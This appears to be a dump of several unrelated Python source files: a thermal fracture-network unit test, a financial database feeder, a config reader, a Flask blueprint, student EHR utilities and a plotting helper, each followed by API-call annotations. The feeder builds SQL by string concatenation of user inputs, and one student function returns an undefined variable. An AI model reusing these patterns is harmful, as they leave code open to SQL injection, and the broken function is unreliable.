Theta_2 = erf(xi_2)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 0,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 0,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
def test_calculate_temperature(self):
"""Test calculate_temperature by constructing manual the equations."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
chi_1 = np.array([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])
chi_2 = np.ones(network_2.n_segments)
chi_2[4:8] = 0.5
chi_2[9:13] = 0.5
m_1 = network_1.mass_flow
m_2 = network_2.mass_flow
beta_1 = 2 * network_1.thermal_cond * network_1.thickness / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness / \
(m_2 * network_2.fluid.c_f)
xi_1 = np.einsum('i,jk->ijk', beta_1 * network_1.length,
1 / (2 * np.sqrt(network_1.thermal_diff * t)))
xi_2 = np.einsum('i,jk->ijk', beta_2 * network_2.length,
1 / (2 * np.sqrt(network_2.thermal_diff * t)))
a = xi_1[[0, 2, 4], :, :].sum(axis=0)
b = xi_1[[0, 1, 3], :, :].sum(axis=0)
xi_seg = beta_1[-1] * z / (2 * np.sqrt(network_1.thermal_diff * t))
Theta_1 = chi_1[0] * chi_1[2] * chi_1[4] * erf(a + xi_seg) + \
chi_1[0] * chi_1[1] * chi_1[3] * erf(b + xi_seg)
a = xi_2[[0, 1, 2, 5, 10], :, :].sum(axis=0)
b = xi_2[[0, 1, 4, 7, 10], :, :].sum(axis=0)
c = xi_2[[0, 3, 6, 7, 10], :, :].sum(axis=0)
d = xi_2[[0, 3, 6, 9, 12], :, :].sum(axis=0)
e = xi_2[[0, 3, 8, 11, 12], :, :].sum(axis=0)
f = xi_2[[0, 1, 4, 9, 12], :, :].sum(axis=0)
C_1 = chi_2[0] * chi_2[1] * chi_2[2] * chi_2[5] * chi_2[10]
C_2 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[7] * chi_2[10]
C_3 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[7] * chi_2[10]
C_4 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[9] * chi_2[12]
C_5 = chi_2[0] * chi_2[3] * chi_2[8] * chi_2[11] * chi_2[12]
C_6 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[9] * chi_2[12]
xi_seg = beta_2[-1] * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_2 = C_1 * erf(a + xi_seg) + C_2 * erf(b + xi_seg) + \
C_3 * erf(c + xi_seg) + C_4 * erf(d + xi_seg) + \
C_5 * erf(e + xi_seg) + C_6 * erf(f + xi_seg)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 5,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 13,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
if __name__ == '__main__':
unittest.main()
| [((282, 4, 282, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((20, 21, 20, 77), 'dfn.Fluid', 'Fluid', (), '', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((33, 25, 34, 56), 'dfn.FractureNetworkThermal', 'FractureNetworkThermal', ({(33, 48, 33, 54): 'conn_1', (33, 56, 33, 59): 'L_1', (33, 61, 33, 64): 'H_1', (33, 66, 33, 69): 'w_1', (33, 71, 33, 74): 'k_r', (34, 48, 34, 55): 'alpha_r'}, {}), '(conn_1, L_1, H_1, w_1, k_r, alpha_r)', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((44, 25, 45, 56), 'dfn.FractureNetworkThermal', 'FractureNetworkThermal', ({(44, 48, 44, 54): 'conn_2', (44, 56, 44, 59): 'L_2', (44, 61, 44, 64): 'H_2', (44, 66, 44, 69): 'w_2', (44, 71, 44, 74): 'k_r', (45, 48, 45, 55): 'alpha_r'}, {}), '(conn_2, L_2, H_2, w_2, k_r, alpha_r)', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((111, 14, 111, 31), 'networkx.MultiDiGraph', 'nx.MultiDiGraph', ({}, {}), '()', True, 'import networkx as nx\n'), ((118, 14, 118, 31), 'networkx.MultiDiGraph', 'nx.MultiDiGraph', ({}, {}), '()', True, 'import networkx as nx\n'), ((129, 26, 129, 64), 'networkx.is_isomorphic', 'nx.is_isomorphic', ({(129, 43, 129, 58): 'network_1.graph', (129, 60, 129, 63): 'G_1'}, {}), '(network_1.graph, G_1)', True, 'import networkx as nx\n'), ((130, 26, 130, 64), 'networkx.is_isomorphic', 'nx.is_isomorphic', ({(130, 43, 130, 58): 'network_2.graph', (130, 60, 130, 63): 'G_2'}, {}), '(network_2.graph, G_2)', True, 'import networkx as nx\n'), ((189, 19, 189, 47), 'numpy.linspace', 'np.linspace', ({(189, 31, 189, 34): '0.0', (189, 36, 189, 41): '100.0', (189, 43, 189, 46): '100'}, {}), '(0.0, 100.0, 100)', True, 'import numpy as np\n'), ((190, 15, 190, 42), 'numpy.meshgrid', 'np.meshgrid', ({(190, 27, 190, 35): 'distance', (190, 37, 190, 41): 'time'}, {}), '(distance, time)', True, 'import numpy as np\n'), ((205, 18, 205, 27), 'scipy.special.erf', 'erf', ({(205, 22, 205, 26): 'xi_1'}, {}), '(xi_1)', False, 'from scipy.special import erf\n'), ((206, 18, 206, 27), 'scipy.special.erf', 'erf', ({(206, 22, 206, 26): 'xi_2'}, {}), '(xi_2)', False, 'from scipy.special import erf\n'), ((224, 19, 224, 47), 'numpy.linspace', 'np.linspace', ({(224, 31, 224, 34): '0.0', (224, 36, 224, 41): '100.0', (224, 43, 224, 46): '100'}, {}), '(0.0, 100.0, 100)', True, 'import numpy as np\n'), ((225, 15, 225, 42), 'numpy.meshgrid', 'np.meshgrid', ({(225, 27, 225, 35): 'distance', (225, 37, 225, 41): 'time'}, {}), '(distance, time)', True, 'import numpy as np\n'), ((230, 16, 230, 56), 'numpy.array', 'np.array', ({(230, 25, 230, 55): '[1.0, 1.0, 1.0, 0.5, 0.5, 1.0]'}, {}), '([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])', True, 'import numpy as np\n'), ((231, 16, 231, 45), 'numpy.ones', 'np.ones', ({(231, 24, 231, 44): 'network_2.n_segments'}, {}), '(network_2.n_segments)', True, 'import numpy as np\n'), ((49, 15, 49, 40), 'copy.copy', 'copy.copy', ({(49, 25, 49, 39): 'self.network_1'}, {}), '(self.network_1)', False, 'import copy\n'), ((49, 42, 49, 67), 'copy.copy', 'copy.copy', ({(49, 52, 49, 66): 'self.network_2'}, {}), '(self.network_2)', False, 'import copy\n'), ((187, 23, 187, 55), 'numpy.linspace', 'np.linspace', ({(187, 35, 187, 44): '(1.0 / 100)', (187, 46, 187, 49): '(1.0)', (187, 51, 187, 54): '(100)'}, {}), '(1.0 / 100, 1.0, 100)', True, 'import numpy as np\n'), ((222, 23, 222, 55), 'numpy.linspace', 'np.linspace', ({(222, 35, 222, 44): '(1.0 / 100)', (222, 46, 222, 49): '(1.0)', (222, 51, 222, 54): '(100)'}, {}), '(1.0 / 100, 1.0, 100)', True, 'import numpy as 
np\n'), ((202, 33, 202, 68), 'numpy.sqrt', 'np.sqrt', ({(202, 41, 202, 67): '(network_1.thermal_diff * t)'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((203, 33, 203, 68), 'numpy.sqrt', 'np.sqrt', ({(203, 41, 203, 67): '(network_2.thermal_diff * t)'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((248, 39, 248, 74), 'numpy.sqrt', 'np.sqrt', ({(248, 47, 248, 73): '(network_1.thermal_diff * t)'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((250, 51, 250, 66), 'scipy.special.erf', 'erf', ({(250, 55, 250, 65): '(a + xi_seg)'}, {}), '(a + xi_seg)', False, 'from scipy.special import erf\n'), ((251, 45, 251, 60), 'scipy.special.erf', 'erf', ({(251, 49, 251, 59): '(b + xi_seg)'}, {}), '(b + xi_seg)', False, 'from scipy.special import erf\n'), ((266, 39, 266, 74), 'numpy.sqrt', 'np.sqrt', ({(266, 47, 266, 73): '(network_2.thermal_diff * t)'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((270, 42, 270, 57), 'scipy.special.erf', 'erf', ({(270, 46, 270, 56): '(f + xi_seg)'}, {}), '(f + xi_seg)', False, 'from scipy.special import erf\n'), ((243, 34, 243, 69), 'numpy.sqrt', 'np.sqrt', ({(243, 42, 243, 68): 'network_1.thermal_diff * t'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((245, 34, 245, 69), 'numpy.sqrt', 'np.sqrt', ({(245, 42, 245, 68): 'network_2.thermal_diff * t'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((270, 18, 270, 33), 'scipy.special.erf', 'erf', ({(270, 22, 270, 32): '(e + xi_seg)'}, {}), '(e + xi_seg)', False, 'from scipy.special import erf\n'), ((269, 42, 269, 57), 'scipy.special.erf', 'erf', ({(269, 46, 269, 56): '(d + xi_seg)'}, {}), '(d + xi_seg)', False, 'from scipy.special import erf\n'), ((269, 18, 269, 33), 'scipy.special.erf', 'erf', ({(269, 22, 269, 32): '(c + xi_seg)'}, {}), '(c + xi_seg)', False, 'from scipy.special import erf\n'), ((268, 25, 268, 40), 'scipy.special.erf', 'erf', ({(268, 29, 268, 39): '(a + xi_seg)'}, {}), '(a + xi_seg)', False, 'from scipy.special import erf\n'), ((268, 49, 268, 64), 'scipy.special.erf', 'erf', ({(268, 53, 268, 63): '(b + xi_seg)'}, {}), '(b + xi_seg)', False, 'from scipy.special import erf\n')] |
gusamarante/Quantequim | dataapi/AWS/getawsdata.py | 3968d9965e8e2c3b5850f1852b56c485859a9c89 | """
Author: Gustavo Amarante
"""
import numpy as np
import pandas as pd
from datetime import datetime
class TrackerFeeder(object):
"""
Feeder for the trackers of the FinanceHub database.
"""
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, fh_ticker):
"""
grabs trackers from the FH database
:param fh_ticker: str or list with the tickers from the database trackers
:return: pandas DataFrame with tickers on the columns
"""
assert type(fh_ticker) is str or type(fh_ticker) is list or type(fh_ticker) is dict, \
"'tickers' must be a string, list or dict"
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers" WHERE '
if type(fh_ticker) is str:
sql_query = sql_query + "fh_ticker IN ('" + fh_ticker + "')"
elif type(fh_ticker) is list:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(fh_ticker) + "')"
elif type(fh_ticker) is dict:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(list(fh_ticker.keys())) + "')"
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
if type(fh_ticker) is dict:
df = df.rename(fh_ticker, axis=1)
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
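    # Usage sketch for fetch() (ticker names are hypothetical):
    #   feeder = TrackerFeeder(db_connect)
    #   feeder.fetch('fh_eq_ibov')                 # one column named 'fh_eq_ibov'
    #   feeder.fetch({'fh_eq_ibov': 'IBOV'})       # same series, column renamed to 'IBOV'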
def fetch_metadata(self):
"""
Returns the full metadata table of the FH trackers, which is useful to do custom filters and look at what
is in the database.
:return: pandas Dataframe
"""
sql_query = 'SELECT * FROM "trackers_description"'
df = pd.read_sql(sql=sql_query, con=self.conn)
return df
def filter_fetch(self, filter_dict, ret='series'):
"""
Grabs the trackers from the FH database that satisfy the criteria given by 'filter_dict'.
:param filter_dict: dict. Keys must be column names from the metadata table. Values must be
either str or list of str
        :param ret: If 'series', returns a dataframe with the tracker series that satisfy the conditions.
                    If 'tickers', returns a list of the tickers that satisfy the conditions.
:return: list or pandas DataFrame
"""
assert type(filter_dict) is dict, "'filter_dict' must be a dict"
assert len(filter_dict) > 0, "'filter_dict' is empty"
        assert ret.lower() in ['series', 'tickers'], "'ret' must be either 'series' or 'tickers'"
desc_query = 'SELECT fh_ticker FROM trackers_description WHERE '
for col in filter_dict.keys():
if type(filter_dict[col]) is list:
desc_query = desc_query + col + " IN ('" + "', '".join(filter_dict[col]) + "')"
else:
desc_query = desc_query + col + f" IN ('{filter_dict[col]}')"
desc_query = desc_query + ' and '
desc_query = desc_query[:-5]
df = pd.read_sql(sql=desc_query, con=self.conn)
tickers = df.values.flatten().tolist()
if ret == 'tickers':
return tickers
df = self.fetch(tickers)
return df
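    # Usage sketch for filter_fetch() (column names and values are hypothetical; use
    # filter_parameters() below to see what is actually available):
    #   feeder.filter_fetch({'asset_class': 'equity', 'currency': ['BRL', 'USD']})
    #   feeder.filter_fetch({'asset_class': 'equity'}, ret='tickers')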
def filter_parameters(self):
"""
Grabs the possible columns and their respective unique values from the metadata table.
:return: dict. Keys are the column names, values are list of unique values of the column.
"""
df = self.fetch_metadata()
param_dict = {}
for col in df.columns:
param_dict[col] = df[col].unique().tolist()
return param_dict
def fetch_everything(self):
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers"'
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
class FocusFeeder(object):
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, index='ipca', frequency='yearly', prediction_scope=None,
dt_ini=None, dt_end=None):
"""
        Grabs data from the database and pivots the results into a dataframe. To ensure consistency, the function can
        only take one index at a time and one frequency at a time. Only 'prediction_scope' can be a list.
If no prediction scope is passed, all available prediction scopes are returned.
:param index: String containing the name of the index.
:param frequency: String. 'yearly', 'monthly' or 'quarterly' (availability depends on the index)
:param prediction_scope: string, float or list. Years that the forecasts are for.
:param dt_ini: string. Initial date for the series
:param dt_end: string. End date for the series
:return: pandas DataFrame with the pivoted data.
"""
# Error Checking
self._basic_assertions(index, frequency, prediction_scope)
# Handle formats
index, frequency, prediction_scope, dt_ini, dt_end, pivot \
= self._map_inputs(index, frequency, prediction_scope, dt_ini, dt_end)
# build sql query
sql_query = self._build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end)
# get data
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.drop_duplicates()
# pivoting
df = df.pivot(index='date', columns=pivot, values='value')
df.index = pd.to_datetime(df.index)
return df
def years_ahead(self, index='IPCA', years=1, dt_ini=None, dt_end=None):
"""
        The metric attribute is set to 'mean' by default because further projections change smoothly
"""
# Error checking
self._basic_assertions_years_ahead(index, years)
# Handle formats
index, dt_ini, dt_end = self._map_inputs_years_ahead(index, dt_ini, dt_end)
# grabs the index for all available years for each date
df = self.fetch(index=index, frequency='yearly', prediction_scope=None,
dt_ini=dt_ini, dt_end=dt_end)
# creates the new dataframe
df_weighted = pd.DataFrame(index=df.index)
df_weighted[index + ' ' + str(years) + ' year ahead'] = np.nan
# days until year end
df_weighted['D2YE'] = ((df_weighted.index + pd.offsets.YearEnd()) -
pd.to_datetime(df_weighted.index.tolist())).days
for ind in df_weighted.index:
if ind.day == 31 and ind.month == 12:
df_weighted.loc[ind, 'D2YE'] = 0
# loops on each date
for date in df_weighted.index:
df_weighted.loc[date, index + ' ' + str(years) + ' year ahead'] = \
(df.loc[date, str(date.year + years - 1)] * df_weighted.loc[date, 'D2YE'] +
df.loc[date, str(date.year + years)] * (365 - df_weighted.loc[date, 'D2YE'])) / 365
df = df_weighted[[index + ' ' + str(years) + ' year ahead']].interpolate()
df.index = pd.to_datetime(df.index)
return df
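    # The constant-horizon series built above is a calendar-weighted blend of two
    # year-end forecasts: with years=1 and 100 days left in the year, the value is
    # (current-year forecast * 100 + next-year forecast * 265) / 365, so the weight
    # shifts smoothly toward the next year as year-end approaches.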
@staticmethod
def _basic_assertions(index, frequency, prediction_scope):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert type(frequency) is str, 'frequency must be a string'
@staticmethod
def _map_inputs(index, frequency, prediction_scope, dt_ini, dt_end):
"""Handle formats of the inputs"""
# index
if type(index) is str:
index = index.lower()
elif type(index) is list:
index = [x.lower() for x in index]
# frequency
frequency = frequency.lower()
# prediction_scope
if type(prediction_scope) is str:
prediction_scope = prediction_scope.lower()
elif type(prediction_scope) is list:
prediction_scope = [str(x).lower() for x in prediction_scope]
elif prediction_scope is None:
prediction_scope = None
else:
prediction_scope = str(prediction_scope).lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
        # pivot variable (while we have no metrics, it's always the prediction scope)
pivot = 'prediction_scope'
return index, frequency, prediction_scope, dt_ini, dt_end, pivot
@staticmethod
def _build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end):
sql_query = 'SELECT DATE, VALUE, PREDICTION_SCOPE FROM "focus_survey" WHERE '
# index (must not be None)
if type(index) is str:
sql_query = sql_query + "lower(INDEX) IN ('" + index + "')"
elif type(index) is list:
sql_query = sql_query + "lower(INDEX) IN ('" + "', '".join(index) + "')"
# frequency
if type(frequency) is str:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + frequency + "')"
elif type(frequency) is list:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + "', '".join(frequency) + "')"
# prediction scope
if type(prediction_scope) is str:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + prediction_scope + "')"
elif type(prediction_scope) is list:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + "', '".join(prediction_scope) + "')"
sql_query = sql_query + " AND DATE BETWEEN '" + dt_ini + "' AND '" + dt_end + "'"
sql_query = sql_query + ' ORDER BY DATE;'
return sql_query
@staticmethod
def _basic_assertions_years_ahead(index, years):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
        assert (type(years) is int) and (1 <= years <= 4), 'number of years must be an integer between 1 and 4'
@staticmethod
def _map_inputs_years_ahead(index, dt_ini, dt_end):
"""Handles the format of the inputs of the years_ahead method"""
index = index.lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
return index, dt_ini, dt_end
| [((43, 13, 43, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((49, 19, 49, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(49, 34, 49, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((62, 13, 62, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((91, 13, 91, 55), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((119, 13, 119, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((122, 19, 122, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(122, 34, 122, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((164, 13, 164, 54), 'pandas.read_sql', 'pd.read_sql', (), '', True, 'import pandas as pd\n'), ((169, 19, 169, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(169, 34, 169, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((189, 22, 189, 50), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((207, 19, 207, 43), 'pandas.to_datetime', 'pd.to_datetime', ({(207, 34, 207, 42): 'df.index'}, {}), '(df.index)', True, 'import pandas as pd\n'), ((193, 52, 193, 72), 'pandas.offsets.YearEnd', 'pd.offsets.YearEnd', ({}, {}), '()', True, 'import pandas as pd\n'), ((247, 21, 247, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((302, 21, 302, 35), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
mklew/quickstart-data-lake-qubole | assets/utils/config.py | bb9b4a559815fc293b0fa06aa7e536fe14ced6dd | from configparser import ConfigParser
CONFIG_INT_KEYS = {
'hadoop_max_nodes_count',
'hadoop_ebs_volumes_count',
'hadoop_ebs_volume_size',
'spark_max_nodes_count',
'spark_ebs_volumes_count',
'spark_ebs_volume_size'
}
def read_config(config_path):
parser = ConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
for (config_key, config_value) in parser.items(section):
config[config_key] = int(config_value) if config_key in CONFIG_INT_KEYS else config_value
return config
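# Example: for an INI file like (section and key names are illustrative)
#
#   [cluster]
#   hadoop_max_nodes_count = 4
#   region = us-east-1
#
# read_config() returns {'hadoop_max_nodes_count': 4, 'region': 'us-east-1'},
# casting to int only the keys listed in CONFIG_INT_KEYS.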
| [((14, 13, 14, 27), 'configparser.ConfigParser', 'ConfigParser', ({}, {}), '()', False, 'from configparser import ConfigParser\n')] |
lvyaoo/api-demo | app/blueprints/admin_api/__init__.py | f45c05c154385510572b5200b74dcbbfdb7e234c | from flask import Blueprint
from .hooks import admin_auth
from ...api_utils import *
bp_admin_api = Blueprint('bp_admin_api', __name__)
bp_admin_api.register_error_handler(APIError, handle_api_error)
bp_admin_api.register_error_handler(500, handle_500_error)
bp_admin_api.register_error_handler(400, handle_400_error)
bp_admin_api.register_error_handler(401, handle_401_error)
bp_admin_api.register_error_handler(403, handle_403_error)
bp_admin_api.register_error_handler(404, handle_404_error)
bp_admin_api.before_request(before_api_request)
bp_admin_api.before_request(admin_auth)
from . import v_admin
| [((7, 15, 7, 50), 'flask.Blueprint', 'Blueprint', ({(7, 25, 7, 39): '"""bp_admin_api"""', (7, 41, 7, 49): '__name__'}, {}), "('bp_admin_api', __name__)", False, 'from flask import Blueprint\n')] |
nihaagarwalla/nd320-c1-emr-data-starter | project/starter_code/student_utils.py | 6ce6bb65e89b38f1c2119a739b892ad2504adf7d | import pandas as pd
import numpy as np
import os
import tensorflow as tf
import functools
####### STUDENTS FILL THIS OUT ######
#Question 3
def reduce_dimension_ndc(df, ndc_df):
'''
df: pandas dataframe, input dataset
ndc_df: pandas dataframe, drug code dataset used for mapping in generic names
return:
df: pandas dataframe, output dataframe with joined generic drug name
'''
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace("Hcl", "Hydrochloride")
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace(" And ", "-")
ndc_df["Non-proprietary Name"]= (ndc_df["Non-proprietary Name"].str.strip()).str.upper()
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("For Suspension, Extended Release", "For Suspension Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Powder, Metered", "Powder Metered")
# ndc_df["Dosage Form"]= (ndc_df["Dosage Form"].str.strip()).str.upper()
# ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]+"_"+ndc_df["Dosage Form"]
ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]
df_reduce_dimension = pd.merge(df, ndc_df, on=['ndc_code'], how='inner')
df_reduce_dimension['LABEL'] = 0
reduce_dim_df= df_reduce_dimension.drop(columns=['Proprietary Name', 'Non-proprietary Name', 'Dosage Form', 'Route Name', 'Company Name', 'Product Type'])
return reduce_dim_df
#Question 4
def select_first_encounter(df):
'''
df: pandas dataframe, dataframe with all encounters
return:
- first_encounter_df: pandas dataframe, dataframe with only the first encounter for a given patient
'''
first_encounter_df = df.sort_values('encounter_id').groupby('patient_nbr').first()
first_encounter_df = first_encounter_df.reset_index()
return first_encounter_df
#Question 6
def patient_dataset_splitter(df, key='patient_nbr'):
'''
df: pandas dataframe, input dataset that will be split
patient_key: string, column that is the patient id
return:
- train: pandas dataframe,
- validation: pandas dataframe,
- test: pandas dataframe,
'''
df = df.iloc[np.random.permutation(len(df))]
unique_values = df[key].unique()
total_values = len(unique_values)
train_size = round(total_values * (1 - 0.4 ))
train = df[df[key].isin(unique_values[:train_size])].reset_index(drop=True)
left_size = len(unique_values[train_size:])
validation_size = round(left_size*0.5)
validation = df[df[key].isin(unique_values[train_size:train_size+validation_size])].reset_index(drop=True)
test = df[df[key].isin(unique_values[validation_size+train_size:])].reset_index(drop=True)
return train, validation, test
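# Usage sketch: the split is done on unique patient ids (roughly 60/20/20), so no
# patient contributes rows to more than one partition.
#   d_train, d_val, d_test = patient_dataset_splitter(df, key='patient_nbr')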
#Question 7
def create_tf_categorical_feature_cols(categorical_col_list,
vocab_dir='./diabetes_vocab/'):
'''
categorical_col_list: list, categorical field list that will be transformed with TF feature column
vocab_dir: string, the path where the vocabulary text files are located
return:
output_tf_list: list of TF feature columns
'''
output_tf_list = []
for c in categorical_col_list:
vocab_file_path = os.path.join(vocab_dir, c + "_vocab.txt")
'''
Which TF function allows you to read from a text file and create a categorical feature
You can use a pattern like this below...
tf_categorical_feature_column = tf.feature_column.......
'''
tf_categorical_feature_column = tf.feature_column.categorical_column_with_vocabulary_file(
key=c, vocabulary_file = vocab_file_path, num_oov_buckets=1)
one_hot_origin_feature = tf.feature_column.indicator_column(tf_categorical_feature_column)
output_tf_list.append(one_hot_origin_feature)
return output_tf_list
#Question 8
def normalize_numeric_with_zscore(col, mean, std):
'''
This function can be used in conjunction with the tf feature column for normalization
'''
return (col - mean)/std
def create_tf_numeric_feature(col, MEAN, STD, default_value=0):
'''
col: string, input numerical column name
MEAN: the mean for the column in the training data
STD: the standard deviation for the column in the training data
default_value: the value that will be used for imputing the field
return:
tf_numeric_feature: tf feature column representation of the input field
'''
normalizer = functools.partial(normalize_numeric_with_zscore, mean=MEAN, std=STD)
tf_numeric_feature= tf.feature_column.numeric_column(
key=col, default_value = default_value, normalizer_fn=normalizer, dtype=tf.float64)
return tf_numeric_feature
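# Example (illustrative values; MEAN and STD should be computed from the training split):
#   age_col = create_tf_numeric_feature('age', MEAN=65.0, STD=10.0, default_value=0)
#   feature_layer = tf.keras.layers.DenseFeatures([age_col])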
#Question 9
def get_mean_std_from_preds(diabetes_yhat):
'''
diabetes_yhat: TF Probability prediction object
'''
m = diabetes_yhat.mean()
s = diabetes_yhat.stddev()
return m, s
# Question 10
def get_student_binary_prediction(df, col):
'''
df: pandas dataframe prediction output dataframe
col: str, probability mean prediction field
return:
student_binary_prediction: pandas dataframe converting input to flattened numpy array and binary labels
def convert_to_binary(df, pred_field, actual_field):
df['score'] = df[pred_field].apply(lambda x: 1 if x>=25 else 0 )
df['label_value'] = df[actual_field].apply(lambda x: 1 if x>=25 else 0)
return df
binary_df = convert_to_binary(model_output_df, 'pred', 'actual_value')
binary_df.head()
'''
    # Apply the 25-unit threshold from the docstring example to the mean prediction
    # column and return a flattened numpy array of binary labels.
    student_binary_prediction = df[col].apply(lambda x: 1 if x >= 25 else 0).to_numpy().flatten()
    return student_binary_prediction
| [((30, 26, 30, 76), 'pandas.merge', 'pd.merge', (), '', True, 'import pandas as pd\n'), ((118, 17, 118, 85), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((119, 24, 120, 87), 'tensorflow.feature_column.numeric_column', 'tf.feature_column.numeric_column', (), '', True, 'import tensorflow as tf\n'), ((86, 26, 86, 68), 'os.path.join', 'os.path.join', ({(86, 39, 86, 48): 'vocab_dir', (86, 51, 86, 67): "c + '_vocab.txt'"}, {}), "(vocab_dir, c + '_vocab.txt')", False, 'import os\n'), ((93, 40, 94, 72), 'tensorflow.feature_column.categorical_column_with_vocabulary_file', 'tf.feature_column.categorical_column_with_vocabulary_file', (), '', True, 'import tensorflow as tf\n'), ((95, 33, 95, 98), 'tensorflow.feature_column.indicator_column', 'tf.feature_column.indicator_column', ({(95, 68, 95, 97): 'tf_categorical_feature_column'}, {}), '(tf_categorical_feature_column)', True, 'import tensorflow as tf\n')] |
peendebak/core_tools | core_tools/utility/plotting/plot_1D.py | 2e43edf0bbc1d7ceb7042559db499535e8f6a076 | import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import copy
from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data
from core_tools.utility.plotting.plot_general import _data_plotter
class plotter_1D(_data_plotter):
def __init__(self, plt_layout = plot_layout(), graph_setings = graph_settings_1D()):
self.plot_layout = plt_layout
self.local_data = np.empty([plt_layout.n_plots_y, plt_layout.n_plots_x], dtype = _1D_plot_single)
for i in range(self.local_data.size):
self.local_data.flat[i] = _1D_plot_single(graph_setings)
class _1D_plot_single:
def __init__(self, graph_settings):
self.settings = copy.copy(graph_settings) #default settings
self.data = []
self.x_lim = None
self.y_lim = None
def set_labels(self, xlabel, ylabel):
self.settings.xlabel = xlabel
self.settings.ylabel = ylabel
def set_range(self, x_range=None, y_range=None):
if x_range is not None:
self.x_lim = x_range
if y_range is not None:
self.y_lim = y_range
